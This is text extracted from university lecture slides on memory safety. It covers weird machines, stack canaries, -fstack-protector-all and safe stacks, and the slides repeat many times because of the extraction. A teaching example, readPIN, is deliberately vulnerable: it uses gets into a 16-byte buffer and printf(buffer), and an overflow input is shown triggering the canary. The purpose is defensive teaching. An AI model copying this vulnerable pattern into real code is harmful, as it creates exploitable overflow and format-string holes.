2. Instantiation: transition from sane state to weird state
3. Programming: program the weird machine
• The fix prevents one weird machine (or its “program”)
• Similar bugs Ñ similar weird machines
61 Michael Schwarz — www.iaik.tugraz.at
![Page 271: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/271.jpg)
Re-cap: Weird machines www.tugraz.at
• We defined exploitation as a three-step procedure
1. Setup: choose sane state which “allows” getting to a weird state
2. Instantiation: transition from sane state to weird state
3. Programming: program the weird machine
• The fix prevents one weird machine (or its “program”)
• Similar bugs Ñ similar weird machines
61 Michael Schwarz — www.iaik.tugraz.at
![Page 272: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/272.jpg)
Re-cap: Weird machines www.tugraz.at
• We defined exploitation as a three-step procedure
1. Setup: choose sane state which “allows” getting to a weird state
2. Instantiation: transition from sane state to weird state
3. Programming: program the weird machine
• The fix prevents one weird machine (or its “program”)
• Similar bugs Ñ similar weird machines
61 Michael Schwarz — www.iaik.tugraz.at
![Page 273: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/273.jpg)
Strategy #1: Exploit. Fix. Feel Safe. Repeat www.tugraz.at
• If an attacker found one bug, there might be other similar bugs
• A lot easier to find and exploit similar bugs
• True until there are no similar bugs anymore
62 Michael Schwarz — www.iaik.tugraz.at
![Page 274: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/274.jpg)
Strategy #1: Exploit. Fix. Feel Safe. Repeat www.tugraz.at
• If an attacker found one bug, there might be other similar bugs
• A lot easier to find and exploit similar bugs
• True until there are no similar bugs anymore
62 Michael Schwarz — www.iaik.tugraz.at
![Page 275: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/275.jpg)
Strategy #1: Exploit. Fix. Feel Safe. Repeat www.tugraz.at
• If an attacker found one bug, there might be other similar bugs
• A lot easier to find and exploit similar bugs
• True until there are no similar bugs anymore
62 Michael Schwarz — www.iaik.tugraz.at
![Page 276: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/276.jpg)
Strategy #1: Exploit. Fix. Feel Safe. Repeat www.tugraz.at
63 Michael Schwarz — www.iaik.tugraz.at
![Page 277: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/277.jpg)
Strategy #1: Exploit. Fix. Feel Safe. Repeat www.tugraz.at
63 Michael Schwarz — www.iaik.tugraz.at
![Page 278: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/278.jpg)
Strategy #1: Exploit. Fix. Feel Safe. Repeat www.tugraz.at
63 Michael Schwarz — www.iaik.tugraz.at
![Page 279: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/279.jpg)
Strategy #1: Exploit. Fix. Feel Safe. Repeat www.tugraz.at
63 Michael Schwarz — www.iaik.tugraz.at
![Page 280: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/280.jpg)
Strategy #2: The Academic Way www.tugraz.at
• Better: defense killing whole class of bugs, e.g. buffer overflows
• Can be extremely hard Ñ not easy to find bug-free programs
• We already win if we prevent exploitation
• And we have a solid definition of exploitation
64 Michael Schwarz — www.iaik.tugraz.at
![Page 281: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/281.jpg)
Strategy #2: The Academic Way www.tugraz.at
• Better: defense killing whole class of bugs, e.g. buffer overflows
• Can be extremely hard Ñ not easy to find bug-free programs
• We already win if we prevent exploitation
• And we have a solid definition of exploitation
64 Michael Schwarz — www.iaik.tugraz.at
![Page 282: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/282.jpg)
Strategy #2: The Academic Way www.tugraz.at
• Better: defense killing whole class of bugs, e.g. buffer overflows
• Can be extremely hard Ñ not easy to find bug-free programs
• We already win if we prevent exploitation
• And we have a solid definition of exploitation
64 Michael Schwarz — www.iaik.tugraz.at
![Page 283: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/283.jpg)
Strategy #2: The Academic Way www.tugraz.at
• Better: defense killing whole class of bugs, e.g. buffer overflows
• Can be extremely hard Ñ not easy to find bug-free programs
• We already win if we prevent exploitation
• And we have a solid definition of exploitation
64 Michael Schwarz — www.iaik.tugraz.at
![Page 284: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/284.jpg)
Strategy #2: The Academic Way www.tugraz.at
• Prevent one step of exploitation
• Cannot prevent Setup step Ñ every transition is sane and the
state is defined
• Try to prevent Instantiation and Programming step
• Start with Instantiation step
• We again use the Simple Password Manager as an example
65 Michael Schwarz — www.iaik.tugraz.at
![Page 285: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/285.jpg)
Strategy #2: The Academic Way www.tugraz.at
• Prevent one step of exploitation
• Cannot prevent Setup step Ñ every transition is sane and the
state is defined
• Try to prevent Instantiation and Programming step
• Start with Instantiation step
• We again use the Simple Password Manager as an example
65 Michael Schwarz — www.iaik.tugraz.at
![Page 286: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/286.jpg)
Strategy #2: The Academic Way www.tugraz.at
• Prevent one step of exploitation
• Cannot prevent Setup step Ñ every transition is sane and the
state is defined
• Try to prevent Instantiation and Programming step
• Start with Instantiation step
• We again use the Simple Password Manager as an example
65 Michael Schwarz — www.iaik.tugraz.at
![Page 287: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/287.jpg)
Strategy #2: The Academic Way www.tugraz.at
• Prevent one step of exploitation
• Cannot prevent Setup step Ñ every transition is sane and the
state is defined
• Try to prevent Instantiation and Programming step
• Start with Instantiation step
• We again use the Simple Password Manager as an example
65 Michael Schwarz — www.iaik.tugraz.at
![Page 288: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/288.jpg)
Strategy #2: The Academic Way www.tugraz.at
• Prevent one step of exploitation
• Cannot prevent Setup step Ñ every transition is sane and the
state is defined
• Try to prevent Instantiation and Programming step
• Start with Instantiation step
• We again use the Simple Password Manager as an example
65 Michael Schwarz — www.iaik.tugraz.at
![Page 289: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/289.jpg)
An Example www.tugraz.at
Read PIN
Show PIN
correct?
Show password list
Error message
Yes
No
uint32_t readPIN() {
char buffer[16];
printf("Enter PIN:\n");
gets(buffer);
if(getenv("DEBUG"))
printf(buffer);
return atoi(buffer);
}
66 Michael Schwarz — www.iaik.tugraz.at
![Page 290: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/290.jpg)
An Example www.tugraz.at
• We assume that the Red Team did not find the bugs (yet)
• We don’t know about the gets and printf bug
• The problem the Blue Team has when defending:
• The Blue Team has to roughly know about possible attacks
• Protecting against a (yet) unknown attack is often not possible
or comes with great costs (e.g. performance overhead)
• Assume we know about stack-buffer overflows
67 Michael Schwarz — www.iaik.tugraz.at
![Page 291: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/291.jpg)
An Example www.tugraz.at
• We assume that the Red Team did not find the bugs (yet)
• We don’t know about the gets and printf bug
• The problem the Blue Team has when defending:
• The Blue Team has to roughly know about possible attacks
• Protecting against a (yet) unknown attack is often not possible
or comes with great costs (e.g. performance overhead)
• Assume we know about stack-buffer overflows
67 Michael Schwarz — www.iaik.tugraz.at
![Page 292: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/292.jpg)
An Example www.tugraz.at
• We assume that the Red Team did not find the bugs (yet)
• We don’t know about the gets and printf bug
• The problem the Blue Team has when defending:
• The Blue Team has to roughly know about possible attacks
• Protecting against a (yet) unknown attack is often not possible
or comes with great costs (e.g. performance overhead)
• Assume we know about stack-buffer overflows
67 Michael Schwarz — www.iaik.tugraz.at
![Page 293: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/293.jpg)
An Example www.tugraz.at
• We assume that the Red Team did not find the bugs (yet)
• We don’t know about the gets and printf bug
• The problem the Blue Team has when defending:
• The Blue Team has to roughly know about possible attacks
• Protecting against a (yet) unknown attack is often not possible
or comes with great costs (e.g. performance overhead)
• Assume we know about stack-buffer overflows
67 Michael Schwarz — www.iaik.tugraz.at
![Page 294: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/294.jpg)
An Example www.tugraz.at
• We assume that the Red Team did not find the bugs (yet)
• We don’t know about the gets and printf bug
• The problem the Blue Team has when defending:
• The Blue Team has to roughly know about possible attacks
• Protecting against a (yet) unknown attack is often not possible
or comes with great costs (e.g. performance overhead)
• Assume we know about stack-buffer overflows
67 Michael Schwarz — www.iaik.tugraz.at
![Page 295: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/295.jpg)
An Example www.tugraz.at
• Want to prevent Instantiation step
• Attacker should not get into weird state using a buffer overflow
• Program should rather die than being attacker controlled
• Remember: Stack overflow Ñ overwrite the saved return
address
• Cannot make it readonly (write permissions have page-level
granularity)
68 Michael Schwarz — www.iaik.tugraz.at
![Page 296: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/296.jpg)
An Example www.tugraz.at
• Want to prevent Instantiation step
• Attacker should not get into weird state using a buffer overflow
• Program should rather die than being attacker controlled
• Remember: Stack overflow Ñ overwrite the saved return
address
• Cannot make it readonly (write permissions have page-level
granularity)
68 Michael Schwarz — www.iaik.tugraz.at
![Page 297: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/297.jpg)
An Example www.tugraz.at
• Want to prevent Instantiation step
• Attacker should not get into weird state using a buffer overflow
• Program should rather die than being attacker controlled
• Remember: Stack overflow Ñ overwrite the saved return
address
• Cannot make it readonly (write permissions have page-level
granularity)
68 Michael Schwarz — www.iaik.tugraz.at
![Page 298: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/298.jpg)
An Example www.tugraz.at
• Want to prevent Instantiation step
• Attacker should not get into weird state using a buffer overflow
• Program should rather die than being attacker controlled
• Remember: Stack overflow Ñ overwrite the saved return
address
• Cannot make it readonly (write permissions have page-level
granularity)
68 Michael Schwarz — www.iaik.tugraz.at
![Page 299: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/299.jpg)
An Example www.tugraz.at
• Simple idea: put a known (random) value between the buffer
and the saved return address
• We call this value canary (yes, like the yellow bird)
• Canary is overwritten first
• On return, check whether the canary has the correct value
• If not Ñ buffer overflow, kill program
69 Michael Schwarz — www.iaik.tugraz.at
![Page 300: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/300.jpg)
An Example www.tugraz.at
• Simple idea: put a known (random) value between the buffer
and the saved return address
• We call this value canary (yes, like the yellow bird)
• Canary is overwritten first
• On return, check whether the canary has the correct value
• If not Ñ buffer overflow, kill program
69 Michael Schwarz — www.iaik.tugraz.at
![Page 301: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/301.jpg)
An Example www.tugraz.at
• Simple idea: put a known (random) value between the buffer
and the saved return address
• We call this value canary (yes, like the yellow bird)
• Canary is overwritten first
• On return, check whether the canary has the correct value
• If not Ñ buffer overflow, kill program
69 Michael Schwarz — www.iaik.tugraz.at
![Page 302: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/302.jpg)
An Example www.tugraz.at
• Simple idea: put a known (random) value between the buffer
and the saved return address
• We call this value canary (yes, like the yellow bird)
• Canary is overwritten first
• On return, check whether the canary has the correct value
• If not Ñ buffer overflow, kill program
69 Michael Schwarz — www.iaik.tugraz.at
![Page 303: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/303.jpg)
An Example www.tugraz.at
• Simple idea: put a known (random) value between the buffer
and the saved return address
• We call this value canary (yes, like the yellow bird)
• Canary is overwritten first
• On return, check whether the canary has the correct value
• If not Ñ buffer overflow, kill program
69 Michael Schwarz — www.iaik.tugraz.at
![Page 304: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/304.jpg)
Overwriting the Stack (Canary) www.tugraz.at
uint32_t readPIN() {
char buffer[16];
printf("Enter PIN:\n");
gets(buffer);
if(getenv("DEBUG")) printf(buffer);
return atoi(buffer);
}
Ñ ...
u,
/
/
/
/
.
/
/
/
/
-
70 Michael Schwarz — www.iaik.tugraz.at
![Page 305: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/305.jpg)
Overwriting the Stack (Canary) www.tugraz.at
uint32_t readPIN() {
char buffer[16];
printf("Enter PIN:\n");
gets(buffer);
if(getenv("DEBUG")) printf(buffer);
return atoi(buffer);
}
...
Ñ IP
u,
/
/
/
/
.
/
/
/
/
-
70 Michael Schwarz — www.iaik.tugraz.at
![Page 306: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/306.jpg)
Overwriting the Stack (Canary) www.tugraz.at
uint32_t readPIN() {
char buffer[16];
printf("Enter PIN:\n");
gets(buffer);
if(getenv("DEBUG")) printf(buffer);
return atoi(buffer);
}
...
IPBP
Ñ 0x01002236 u Canary,
/
/
/
/
.
/
/
/
/
-
70 Michael Schwarz — www.iaik.tugraz.at
![Page 307: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/307.jpg)
Overwriting the Stack (Canary) www.tugraz.at
uint32_t readPIN() {
char buffer[16];
printf("Enter PIN:\n");
gets(buffer);
if(getenv("DEBUG")) printf(buffer);
return atoi(buffer);
}
...
IPBP
Ñ 0x01002236 u Canary,
/
/
/
/
.
/
/
/
/
-
buffer
70 Michael Schwarz — www.iaik.tugraz.at
![Page 308: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/308.jpg)
Overwriting the Stack (Canary) www.tugraz.at
uint32_t readPIN() {
char buffer[16];
printf("Enter PIN:\n");
gets(buffer);
if(getenv("DEBUG")) printf(buffer);
return atoi(buffer);
}
...
IP 0x35343332BP 0x31303938
Ñ 0x01002236 0x37363534 u Canary0x333231300x393837360x353433320x313039380x373635340x33323130
,
/
/
/
/
.
/
/
/
/
-
buffer
70 Michael Schwarz — www.iaik.tugraz.at
![Page 309: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/309.jpg)
Overwriting the Stack (Canary) www.tugraz.at
uint32_t readPIN() {
char buffer[16];
printf("Enter PIN:\n");
gets(buffer);
if(getenv("DEBUG")) printf(buffer);
return atoi(buffer);
}
...
Ñ IP 0x35343332BP 0x31303938
0x01002236 0x37363534 u Canary0x333231300x393837360x353433320x313039380x373635340x33323130
,
/
/
/
/
.
/
/
/
/
-
buffer
Before return, check
canary Ñ 0x01002236 ‰
0x37363534 Ñ exit
70 Michael Schwarz — www.iaik.tugraz.at
![Page 310: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/310.jpg)
Trigger the Bug with Stack Canary www.tugraz.at
• Stack canaries are default in gcc
• However, only buffers larger than 8 bytes are protected
• We can use -fstack-protector-all to protect all buffers
% gcc pwdman.c -fstack-protector-all -o pwdman
% ./pwdman
Enter PIN:
012345678901234567890123456789
*** stack smashing detected ***: ./pwdman terminated
[1] 7569 abort (core dumped) ./pwdman
71 Michael Schwarz — www.iaik.tugraz.at
![Page 311: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/311.jpg)
Trigger the Bug with Stack Canary www.tugraz.at
• Stack canaries are default in gcc
• However, only buffers larger than 8 bytes are protected
• We can use -fstack-protector-all to protect all buffers
% gcc pwdman.c -fstack-protector-all -o pwdman
% ./pwdman
Enter PIN:
012345678901234567890123456789
*** stack smashing detected ***: ./pwdman terminated
[1] 7569 abort (core dumped) ./pwdman
71 Michael Schwarz — www.iaik.tugraz.at
![Page 312: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/312.jpg)
Trigger the Bug with Stack Canary www.tugraz.at
• Stack canaries are default in gcc
• However, only buffers larger than 8 bytes are protected
• We can use -fstack-protector-all to protect all buffers
% gcc pwdman.c -fstack-protector-all -o pwdman
% ./pwdman
Enter PIN:
012345678901234567890123456789
*** stack smashing detected ***: ./pwdman terminated
[1] 7569 abort (core dumped) ./pwdman
71 Michael Schwarz — www.iaik.tugraz.at
![Page 313: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/313.jpg)
Trigger the Bug with Stack Canary www.tugraz.at
• Stack canaries are default in gcc
• However, only buffers larger than 8 bytes are protected
• We can use -fstack-protector-all to protect all buffers
% gcc pwdman.c -fstack-protector-all -o pwdman
% ./pwdman
Enter PIN:
012345678901234567890123456789
*** stack smashing detected ***: ./pwdman terminated
[1] 7569 abort (core dumped) ./pwdman
71 Michael Schwarz — www.iaik.tugraz.at
![Page 314: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/314.jpg)
Trigger the Bug with Stack Canary www.tugraz.at
• Stack canaries are default in gcc
• However, only buffers larger than 8 bytes are protected
• We can use -fstack-protector-all to protect all buffers
% gcc pwdman.c -fstack-protector-all -o pwdman
% ./pwdman
Enter PIN:
012345678901234567890123456789
*** stack smashing detected ***: ./pwdman terminated
[1] 7569 abort (core dumped) ./pwdman
71 Michael Schwarz — www.iaik.tugraz.at
![Page 315: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/315.jpg)
We fixed a class of bugs www.tugraz.at
• We fixed the class of stack-overflow bugs
• The canary protects every stack buffer from being used to get
into a “weird state”
72 Michael Schwarz — www.iaik.tugraz.at
![Page 316: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/316.jpg)
We fixed a class of bugs www.tugraz.at
• We fixed the class of stack-overflow bugs
• The canary protects every stack buffer from being used to get
into a “weird state”
72 Michael Schwarz — www.iaik.tugraz.at
![Page 317: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/317.jpg)
We fixed a class of bugs www.tugraz.at
• We fixed the class of stack-overflow bugs
• The canary protects every stack buffer from being used to get
into a “weird state”
72 Michael Schwarz — www.iaik.tugraz.at
![Page 318: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/318.jpg)
We fixed a class of bugs www.tugraz.at
• Simple stack-buffer overflow cannot get into an exploitable
weird state
• Leak canary using a different trick (e.g., printf bug, or
out-of-bounds read)
Ñ Only prevented a part of a class of bugs
• Still other ways to get into a weird state
• We want something more generic, even if less powerful
73 Michael Schwarz — www.iaik.tugraz.at
![Page 319: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/319.jpg)
We fixed a class of bugs www.tugraz.at
• Simple stack-buffer overflow cannot get into an exploitable
weird state
• Leak canary using a different trick (e.g., printf bug, or
out-of-bounds read)
Ñ Only prevented a part of a class of bugs
• Still other ways to get into a weird state
• We want something more generic, even if less powerful
73 Michael Schwarz — www.iaik.tugraz.at
![Page 320: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/320.jpg)
We fixed a class of bugs www.tugraz.at
• Simple stack-buffer overflow cannot get into an exploitable
weird state
• Leak canary using a different trick (e.g., printf bug, or
out-of-bounds read)
Ñ Only prevented a part of a class of bugs
• Still other ways to get into a weird state
• We want something more generic, even if less powerful
73 Michael Schwarz — www.iaik.tugraz.at
![Page 321: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/321.jpg)
We fixed a class of bugs www.tugraz.at
• Simple stack-buffer overflow cannot get into an exploitable
weird state
• Leak canary using a different trick (e.g., printf bug, or
out-of-bounds read)
Ñ Only prevented a part of a class of bugs
• Still other ways to get into a weird state
• We want something more generic, even if less powerful
73 Michael Schwarz — www.iaik.tugraz.at
![Page 322: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/322.jpg)
We fixed a class of bugs www.tugraz.at
• Simple stack-buffer overflow cannot get into an exploitable
weird state
• Leak canary using a different trick (e.g., printf bug, or
out-of-bounds read)
Ñ Only prevented a part of a class of bugs
• Still other ways to get into a weird state
• We want something more generic, even if less powerful
73 Michael Schwarz — www.iaik.tugraz.at
![Page 323: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/323.jpg)
Any alternatives? www.tugraz.at
• Alternative to prevent the Instantiation step?
• Overwritting saved instruction pointer on the stack Ñ weird
state
Ñ Separate saved return addresses and buffers
74 Michael Schwarz — www.iaik.tugraz.at
![Page 324: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/324.jpg)
Any alternatives? www.tugraz.at
• Alternative to prevent the Instantiation step?
• Overwritting saved instruction pointer on the stack Ñ weird
state
Ñ Separate saved return addresses and buffers
74 Michael Schwarz — www.iaik.tugraz.at
![Page 325: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/325.jpg)
Any alternatives? www.tugraz.at
• Alternative to prevent the Instantiation step?
• Overwritting saved instruction pointer on the stack Ñ weird
state
Ñ Separate saved return addresses and buffers
74 Michael Schwarz — www.iaik.tugraz.at
![Page 326: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/326.jpg)
An alternative: Safe Stack www.tugraz.at
• Simple idea: two different stacks, a safe stack and an unsafe
stack
• Simple variables and return values on the safe stack
• Buffers on the unsafe stack
• Buffer overflows cannot overwrite the return address anymore
75 Michael Schwarz — www.iaik.tugraz.at
![Page 327: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/327.jpg)
An alternative: Safe Stack www.tugraz.at
• Simple idea: two different stacks, a safe stack and an unsafe
stack
• Simple variables and return values on the safe stack
• Buffers on the unsafe stack
• Buffer overflows cannot overwrite the return address anymore
75 Michael Schwarz — www.iaik.tugraz.at
